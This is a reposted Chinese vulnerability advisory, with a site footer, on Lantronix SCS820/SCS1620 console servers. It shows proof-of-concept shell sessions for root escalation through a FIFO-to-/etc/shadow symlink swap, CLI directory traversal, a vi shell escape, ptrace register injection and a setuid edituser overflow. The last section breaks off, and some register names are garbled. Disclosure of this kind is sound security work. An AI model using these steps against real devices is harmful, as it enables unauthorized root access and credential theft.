Lantronix Secure Console Server SCS820/SCS162…
2008-04-09 04:15:07来源:互联网 阅读 ()
发布日期:2005-08-08
更新日期:2005-08-08
受影响系统:
Lantronix Secure Console Server SCS820描述:
Lantronix Secure Console Server SCS1620
BUGTRAQ ID: 14486
SCS820和SCS1620是ActiveLinx家族安全控制台服务器(SCS)的成员,用于处理本地和远程的IT事件。
Lantronix Secure Console Server中存在多个安全漏洞,允许攻击者通过缓冲区溢出和不安全的文件系统配置获得root权限。
1 覆盖root用户的文件
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|
[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server
现在用户在等待系统管理员登录以入侵控制台:
sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout
[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......
另一个窗口:
[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::
2 目录遍历获得基础系统的访问
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$
3 Sysadmin变为root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!
从ci接口和strace以sysadmin运行bash,得到以下内容:
sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0
通过目录遍历:
sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...
sysadmin>../../../home/sysadmin/snakeoil 10719
Attached process [10719] OK!
Stack regsiters for PID of [10719]
Stack Address of 陎 = [0xfffffe00]
Stack Address of 靫 = [0xbffff100]
Stack Address of 韝 = [0x00000000]
Stack Address of 離 = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of 雙 = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of 韎 = [0xffffffff]
Stack Address of %eip = [0x400d79a9]
Injecting %eip register with [0xbffff2bb]
Stack regsiters for PID of [10719]
Stack Address of 陎 = [0xfffffe00]
Stack Address of 靫 = [0xbffff100]
Stack Address of 韝 = [0x00000000]
Stack Address of 離 = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of 雙 = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of 韎 = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!
bash#
4 通过edituser二进制程序中的缓冲区溢出成为root用户
[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
